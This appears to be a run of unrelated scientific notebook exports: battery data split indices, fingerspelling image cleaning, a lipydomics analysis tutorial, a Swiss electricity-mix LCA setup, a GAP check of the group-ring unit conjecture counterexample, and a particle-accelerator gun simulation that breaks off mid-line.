you are interested in using the same train/test split as the paper, use the indices specified belowtest_ind = np.hstack((np.arange(0,(numBat1+numBat2),2),83)) train_ind = np.arange(1,(numBat1+numBat2-1),2) secondary_test_ind = np.arange(numBat-numBat3,numBat); print (test_ind) print (train_ind) print (secondary_test_ind)[ 0 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 34 36 38 40 42 44 46 48 50 52 54 56 58 60 62 64 66 68 70 72 74 76 78 80 82] [ 1 3 5 7 9 11 13 15 17 19 21 23 25 27 29 31 33 35 37 39 41 43 45 47 49 51 53 55 57 59 61 63 65 67 69 71 73 75 77 79 81] [ 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123]Cleaning RWTH German Fingerspelling DataThe script `./registerRecordedGesturesAll.sh ` converts the video from training session and test session to jpeg images. However, not all frames of video contain valid fingerspelling image. This script takes 10 images for each video that is most likely to contain the fingerspelling image and create training and test dataset.import os import glob import shutil srcDir = "./data/image/" if not os.path.exists("./data/train"): os.makedirs("./data/train") if not os.path.exists("./data/test"): os.makedirs("./data/test") dstDirTrain = "./data/train/" dstDirTest = "./data/test/" labels = [i for i in range(1,36) if i not in [10, 26, 27, 28, 29]] session = 2 dstDir = dstDirTest for label in labels: srcPath = srcDir + str(label) dstPath = dstDir + str(label) if not os.path.exists(dstPath): os.makedirs(dstPath) for person in range(1,21): for camera in ["cam1", "cam2"]: imagePath = srcPath + "/{}_{}_{}_{}_*.jpg".format(person, label, session, camera) print(imagePath) imageList = sorted(glob.glob(imagePath)) lastFile = imageList[-1] lastNumber = int(lastFile.replace(".jpg", "").split("_")[-1]) half = int(lastNumber/2) start = half - 10 for frame in range(start, half+1): extraZero = "" if frame < 10: extraZero = "0" image = srcPath + "/{}_{}_{}_{}_000000{}{}.jpg".format(person, label, session, camera, extraZero, frame) shutil.copy(image, dstPath)./data/image/1/1_1_2_cam1_*.jpg ./data/image/1/1_1_2_cam2_*.jpg ./data/image/1/2_1_2_cam1_*.jpg ./data/image/1/2_1_2_cam2_*.jpg ./data/image/1/3_1_2_cam1_*.jpg ./data/image/1/3_1_2_cam2_*.jpg ./data/image/1/4_1_2_cam1_*.jpg ./data/image/1/4_1_2_cam2_*.jpg ./data/image/1/5_1_2_cam1_*.jpg ./data/image/1/5_1_2_cam2_*.jpg ./data/image/1/6_1_2_cam1_*.jpg ./data/image/1/6_1_2_cam2_*.jpg ./data/image/1/7_1_2_cam1_*.jpg ./data/image/1/7_1_2_cam2_*.jpg ./data/image/1/8_1_2_cam1_*.jpg ./data/image/1/8_1_2_cam2_*.jpg ./data/image/1/9_1_2_cam1_*.jpg ./data/image/1/9_1_2_cam2_*.jpg ./data/image/1/10_1_2_cam1_*.jpg ./data/image/1/10_1_2_cam2_*.jpg ./data/image/1/11_1_2_cam1_*.jpg ./data/image/1/11_1_2_cam2_*.jpg ./data/image/1/12_1_2_cam1_*.jpg ./data/image/1/12_1_2_cam2_*.jpg ./data/image/1/13_1_2_cam1_*.jpg ./data/image/1/13_1_2_cam2_*.jpg ./data/image/1/14_1_2_cam1_*.jpg ./data/image/1/14_1_2_cam2_*.jpg ./data/image/1/15_1_2_cam1_*.jpg ./data/image/1/15_1_2_cam2_*.jpg ./data/image/1/16_1_2_cam1_*[...]Example Lipidomics Data Analysis (Interactive)_(lipydomics version: 1.4.x)_--- 1) Initialize a DatasetWe will be using `example_raw.csv` as the raw data file for this work (the data is positive mode and has not been normalized). We first need to initialize a lipydomics dataset from the raw data:# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 1 Please enter the path to the csv file you want to work with. > example_raw.csv What ESI mode was used for this data? (pos/neg) > pos ! INFO: Loaded a new Dataset from .csv file: "example_raw.csv" Would you like to automatically assign groups from headers? (y/N) > What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 8 Dataset( csv="example_raw.csv", esi_mode="pos", samples=16, features=3342, identified=False, normalized=False, rt_calibrated=False, ext_var=False, group_indices=None, stats={} ) What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage[...]We have now done the bare minimum to load the data and we have a lipydomics dataset initialized. We can see from the overview that there are 16 samples and 3342 features in this dataset. We saved our Dataset to file (`example.pickle`) for easy loading in subsequent steps. --- 2) Prepare the Dataset 2.1) Assign GroupsCurrently, we have 16 samples in our dataset, but we have not provided any information on what groups they belong to. We could have automatically assigned groups based on the properly formatted column headings in the raw data file (`example_raw.csv`) when we initialized the dataset, but we will assign them manually instead.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 1 Managing groups... What would you like to do? 1. Assign group 2. View assigned groups 3. Get data by group(s) "back" to go back > 1 Please provide a name for a group and its indices in order of name > starting index > ending index. * group name should not contain spaces * indices start at 0 * example: 'A 1 3' > 0641 0 3 ! INFO: Assigned indices: [0, 1, 2, 3] to group: "0641" Managing groups...[...]Now all of the samples have been assigned to one of four groups: `0641`, `geh`, `sal1`, and `wt`. These group IDs will be used later on when we select data or perform statistical analyses. 2.2) Normalize IntensitiesCurrently, the feature intensities are only raw values. We are going to normalize them using weights derived from an external normalization factor (pellet masses), but we also have the option to normalize to the signal from an internal standard if desired. The normalization weights are in `weights.txt`, a simple text file with the weights for each sample, one per line (16 total).# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 6 Normalizing data... What would you like to do? 1. Internal 2. External "back" to go back > 2 Please provide a text file with the normalization values weights.txt ! INFO: Successfully normalized What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time [...]If we look at the dataset overview we can see that we now have assigned all of our samples to groups and we have a table of normalized intensities. 2.3) Identify LipidsAnother dataset preparation step we can perform before diving in to the data analysis is identifying as many lipids as possible. There are multiple identification criteria that take into account theoretical and measured m/z, retention time, and/or CCS, all of which vary in the level of confidence in the identifications they yield. We will use an approach that tries the highest confidence identification criteria first, then tries others.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 5 Identifying Lipids... Please enter the tolerances for m/z, retention time and CCS matching * separated by spaces * example: '0.01 0.5 3.0' * CCS tolerance is a percentage, not an absolute value > 0.03 0.3 3.0 Please specify an identification level 'theo_mz' - match on theoretical m/z 'theo_mz_rt' - match on theoretical m/z and retention time 'theo_mz_ccs' - match on theoretical m/z and CCS 'th[...]Using the `any` identification level and m/z, retention time, and CCS tolerances of 0.03 0.3 3.0, respectively, 2063 lipids were identified. Now the dataset is fully prepared and we can start performing statistical analyses and generating plots. --- 3) Statistical Analyses and Plotting 3.1) Compute ANOVA P-value for All GroupsA common analysis performed on lipidomics data is calculating the p-value of each feature from an ANOVA using the intensities from all groups. This gives an indication of how the variance between groups compares to the variance within groups, and a significant p-value indicates that there is some significant difference in the intensities for a given feature between the different groups.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 1 Would you like to use normalize[...]_* The above `RuntimeWarning` can be ignored in this case, it is caused by the presence of features that have all 0 intensities which gives a within-group variance of 0 and therefore causing devision by 0._ 3.2) Pricipal Components Analysis (All Groups)PCA is an untargeted analysis that gives an indication of the overall variation between samples, as well as the individual features that contribute to this variation. We will compute a 3-component PCA in order to assess the variance between groups in this dataset.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 2 Would you like to use normalize[...]Now we have computed the 3-component PCA, and we can see two new stats entries in our dataset: "PCA3_0641-geh-sal1-wt_projections_normed" and "PCA3_0641-geh-sal1-wt_loadings_normed". Now we can take a look at the projections in a plot.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 4 Making Plots... What would you like to do? 1. Bar plot feature by group 2. Batch bar plot features by group 3. Scatter PCA3 Projections by group 4. Scatter PLS-DA Projections by group 5. S-Plot PLSA-DA and Pearson correlation by group 6. Scatter PLS-RA Projections by group 7. Heatmap of Log2(fold-change) by lipid class "back" to go back > 3 Where would you like to save the plot(s)? (default =[...]Now we can take a look at the plot (`PCA3_0641-geh-sal1-wt_projections_normed.png`). It looks like `geh` and `wt` separate along PC1 while `sal1` and `wt` separate along PC2, so these might be a couple of good pairwise comparisons to explore further. 3.3) PLS-DA and Correlation on `wt` and `geh`Partial least-squares discriminant analysis (PLS-DA) is an analysis that is similar to PCA, except it finds significant variance between two specified groups (_i.e._ it is a supervised analysis).# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 3 Would you like to use normalize[...]Now we have computed the PLS-DA, and we can see two new stats entries in our dataset: "PLS-DA_geh-wt_projections_normed" and "PLS-DA_geh-wt_loadings_normed". Now we can take a look at the projections in a plot.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 4 Making Plots... What would you like to do? 1. Bar plot feature by group 2. Batch bar plot features by group 3. Scatter PCA3 Projections by group 4. Scatter PLS-DA Projections by group 5. S-Plot PLSA-DA and Pearson correlation by group 6. Scatter PLS-RA Projections by group 7. Heatmap of Log2(fold-change) by lipid class "back" to go back > 4 Where would you like to save the plot(s)? (default =[...]Now we can take a look at the plot (`PLS-DA_projections_geh-wt_normed.png`).As expected, `geh` and `wt` separate cleanly along component 1 corresponding to between group differences. The spread of both groups along component 2, related to intra-group variance, is similar between both groups indicating a similar amount of variance in both groups uncorrelated between them. A similar targeted analysis is the Pearson correlation coefficient between the two groups, which we need to calculate in order to produce an S-plot and tease out which lipid features are driving the separation between `geh` and `wt`.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 4 Would you like to use normalize[...]We can take a look at the plot that was generated (`S-Plot_geh-wt_normed.png`).There appear to be several lipid features that drive separation between `geh` and `wt`, as indicated by the points in the lower left (red) and upper right (blue) corners of the plot. The last step is to export the data and manually inspect these significant features. 4) Export Dataset to SpreadsheetWe need to export our processed Dataset into a spreadsheet format so that we can more closely inspect the data and identify the lipid features that drive the separation that we identified between the `geh` and `wt` groups.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 10 Exporting data... Where would you like to save the file? example: 'jang_ho/results.xlsx' "back" to go back > example.xlsx ! INFO: Successfully exported dataset to Excel spreadsheet: example.xlsx. What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Tim[...]5) Examine Specific LipidsManual inspection of the data has revealed a handful of individual lipid species that differ significantly between `geh` and `wt`:| abundant in | m/z | retention time | CCS | putative id | id level || :---: | :---: | :---: | :---: | :--- | :--- || `geh` | 874.7869 | 0.43 | 320.3 | TG(52:3)_[M+NH4]+ | meas_mz_ccs || `geh` | 878.8154 | 0.62 | 322.7 | TG(52:1)_[M+NH4]+ | meas_mz_ccs || `geh` | 848.7709 | 0.40 | 313.3 | TG(50:2)_[M+NH4]+ | theo_mz_ccs || `geh` | 605.5523 | 0.86 | 267.7 | DG(36:1)_[M+H-H2O]+ | theo_mz_ccs || `geh` | 591.5378 | 0.93 | 263.9 | DG(35:1)_[M+H-H2O]+ | theo_mz_ccs || `wt` | 496.3423 | 4.15 | 229.8 | LPC(16:0)_[M+H]+ | meas_mz_ccs || `wt` | 524.3729 | 4.08 | 235.1 | LPC(18:0)_[M+H]+ | meas_mz_ccs || `wt` | 810.6031 | 3.46 | 295.3 | PC(36:1)_[M+Na]+ | meas_mz_ccs || `wt` | 782.5729 | 3.50 | 290.5 | PG(35:0)_[M+NH4]+ | theo_mz_ccs | 5.1) Generate Plots for Significant Lipid FeaturesNow that we have identified some potentially significant lipid feautures, we need to generate some bar plots for comparison. To avoid clogging up our working directory, we will save the feature plots in the `features` directory. The m/z, retention time, and CCS values are all listed in `features.csv`, and we will use this to generate the barplots all at once.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 4 Making Plots... What would you like to do? 1. Bar plot feature by group 2. Batch bar plot features by group 3. Scatter PCA3 Projections by group 4. Scatter PLS-DA Projections by group 5. S-Plot PLSA-DA and Pearson correlation by group 6. Scatter PLS-RA Projections by group 7. Heatmap of Log2(fold-change) by lipid class "back" to go back > 2 Where would you like to save the plot(s)? (default =[...]Now we can look at all of the plots that have been generated in the `features/` directory. __Abundant in `geh`__ __Abundant in `wt`__ 5.2) Generate a Heatmap of TGs There seems to be an upregulation of TGs in `geh` relative to `wt`, so it might be nice to see if there are any large-scale trends among TGs as a lipid class between these groups. In order to make this comparison, we will need to compute another statistic: the Log2(fold-change) between the two groups.main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 6 Would you like to use normalize[...]Create `ActivityDataset` as this is the only way to specify the `id`.AD.create( id=100000, code="CH-residual", database="Swiss residual electricity mix", location="CH", name="Swiss residual electricity mix", product="electricity, high voltage", type="process", data=dict( unit="kilowatt_hour", comment="Difference between generation fractions for SwissGrid and ENTSO", location="CH", name="Swiss residual electricity mix", reference_product="electricity, high voltage", ) ) act = bd.get_activity(id=100000) act act.new_exchange(input=act, type="production", amount=1).save() switzerland_residual = { 'electricity production, hydro, reservoir, alpine region': 0.2814150228066876, 'electricity production, hydro, run-of-river': 0.636056236216345, 'heat and power co-generation, wood chips, 6667 kW, state-of-the-art 2014': 0.012048389472504549, 'heat and power co-generation, biogas, gas engine': 0.059773867534434144, 'heat and power co-generation, natural gas, 500kW electrical, lean burn': 0.006612375072688834, 'electricity production, wind, >3MW turbine, onshore': 0.0010024269784498687, 'electricity production, wind, 1-3MW turbine, onshore': 0.0026554668750543753, 'electricity production, wind, <1MW turbine, onshore': 0.00043621504383564323 } act_mapping = { act: switzerland_residual[act['name']] for act in bd.Database("ecoinvent 3.8 cutoff") if act['location'] == 'CH' and act['unit'] == 'kilowatt hour' and act['name'] in switzerland_residual } assert len(act_mapping) == len(switzerland_residual) act_mapping for key, value in act_mapping.items(): act.new_exchange(input=key, type='technosphere', amount=value).save() for exc in act.exchanges(): print(exc) sr.process()Verification of the counterexample to the unit conjecture for group rings In this notebook, we follow the proof by in "A counterexample to the unit conjecture for group rings" (https://arxiv.org/abs/2102.11818) and provide an independent verification of the calculations in GAP. The natural idea would be to create the group $G$ as follows:F:=FreeGroup("a","b"); G:=F/ParseRelators(GeneratorsOfGroup(F),"(a^2)^b=a^-2, (b^2)^a=b^-2");This, however, does not work. Depending on packages loaded, GAP will either descend into calculating the order of the group, or, if you will will try bypass that by setting it to infinity, will run out of time after the following: ```SetSize(G,infinity); to trick LAGUNA package gens:=GeneratorsOfGroup(G);a:=gens[1];;b:=gens[2];;F:=GF(2);FG:=GroupRing(F,G);e:=One(FG);;x:=e*a^2;;y:=e*b^2;;z:=e*(a*b)^2;;p:=(e+x)*(e+y)*(e+z^-1);``` We can use the dataset "Diffuse property of low dimensional Bieberbach groups" by (https://mat.ug.edu.pl/~rlutowsk/diffuse/), mentioned in "A short note about diffuse Bieberbach groups" by , and (https://arxiv.org/abs/1703.04972), to find out the generators of this group given as a matrix group. After downloading and unpacking the dataset, call in GAP```f:=ReadAsFunction("diffuse.g");d:=f();;d3:=Filtered(d, x-> x.dim=3);; only 10 groups of dimension 3 g:=Filtered(d3, x-> x.diffuse=false);```to get```[ rec( cgens := [ [ [ -1, 0, 0, 0 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ], [ [ 1, 0, 0, 1/2 ], [ 0, -1, 0, 0 ], [ 0, 0, -1, 0 ], [ 0, 0, 0, 1 ] ] ], diffuse := false, dim := 3, hdiff := false, holonomy := [ 4, 2 ], name := "min.10.1.1.7", zrank := 0 ) ]``` Now we can construct the group using the supplied generators, and follow the proof to check that it gives a construction for a unit.gens:= [ [ [ -1, 0, 0, 0 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ], [ [ 1, 0, 0, 1/2 ], [ 0, -1, 0, 0 ], [ 0, 0, -1, 0 ], [ 0, 0, 0, 1 ] ] ]; a:=gens[1]; b:=gens[2]; G:=Group(gens); Size(G)=infinity;We are now constructing the group algebra of $G$ over the field of two elements $F$:F:=GF(2); FG:=GroupRing(F,G);; Print(FG);AlgebraWithOne( GF(2), ... )This is the identity element of $FG$. We will use it to embed elements of $G$ into $FG$ (of course, we could have used `Embedding` instead).e:=One(FG);;Print(e);(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, 0 ], [ 0, 0, 0, 1 ] ]Here we construct $x$, $y$, $p$, $q$,$r$, $s$ as given in the formulation of Theorem A:x:=e*a^2;;Print(x); y:=e*b^2;;Print(y); z:=e*(a*b)^2;;Print(z); p:=(e+x)*(e+y)*(e+z^-1);;Print(p); q:=x^-1*y^-1 + x + y^-1*z + z;;Print(q); r:=e+x+y^-1*z+x*y*z;;Print(r); s:=e+(x+x^-1+y+y^-1)*z^-1;;Print(s);(Z(2)^0)*[ [ 1, 0, 0, -1 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, -1 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, 0 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 1 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 1 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]Then theorem A states that $u$ is a non-trivial unit of $FG$:u := p + q*a + r*b + s*a*b;;Print(u);(Z(2)^0)*[ [ -1, 0, 0, -3/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, -1 ], [ 0, 1, 0, -1/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, -1 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 3/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, -1/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, 3/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ -1, 0, 0, 0 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 3/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, 0 ], [ 0, 1, 0, 3/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, 1/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ 1, 0, 0, -1/2 ], [ 0, -1, 0, 0 ], [ 0, 0, -1, 1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, [...]Here there is a construction of $v = u^{-1}$:p1 := x^-1 * p^(e*a);;Print(p1); q1 := -x^-1 * q;;Print(q1); r1 := -y^-1 * r;;Print(r1); s1 := z^-1 * s^(e*a);;Print(s1); v := p1 + q1*a + r1*b + s1*a*b;;Print(v);(Z(2)^0)*[ [ -1, 0, 0, -3/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, -1 ], [ 0, 1, 0, -3/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, -1 ], [ 0, 1, 0, -1/2 ], [ 0, 0, -1, 3/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, -1/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, 3/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ -1, 0, 0, 0 ], [ 0, 1, 0, -1/2 ], [ 0, 0, -1, 3/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, 0 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, 1/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ 1, 0, 0, -3/2 ], [ 0, -1, 0, 0 ], [ 0, 0, -1, 1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, -1 ], [ 0, 1, 0, -1 ], [ 0, 0, 1, 0 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, -1 ], [ 0, 1, 0, -1 ], [ 0, [...]Finally, we verify that $uv = vu = 1$:w:=u*v;;Print(w); w=e; w:=v*u;;Print(w);(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, 0 ], [ 0, 0, 0, 1 ] ]Instead of comparing with `e`, could also use `IsOne`:IsOne(w);APEX Gun examplefrom gpt import GPT from distgen import Generator import os GPT_IN = 'templates/apex_gun/gpt.in' DISTGEN_IN = 'templates/apex_gun/distgen.yaml' gen = Generator(DISTGEN_IN) gen['n_particle'] = 1000 gen.run() P0 = gen.particles factor = 2 #P0.x *= factor #P0.y *= 1/factor P0.plot('x', 'y') from gpt import run_gpt_with_distgen settings = {'n_particle':100, 'gun_peak_field':20e6, 'gun_relative_phase':0, 'BSOL':0.075, 'tmax': 5e-9, 'RadiusMax':.015, 'Ntout':2000, 'dtmin':0, 'GBacc':6.5, 'xacc':6.5, 'space_charge':1} G = run_gpt_with_distgen(settings, gpt_input_file=GPT_IN, distgen_input_file=DISTGEN_IN, auto_phase=True, verbose=True) G.plot('sigma_x') G.plot('mean_kinetic_energy') G.particles[-1] G.plot()Plot trajectoriesG.particles[0]._settable_array_keys import numpy as np from 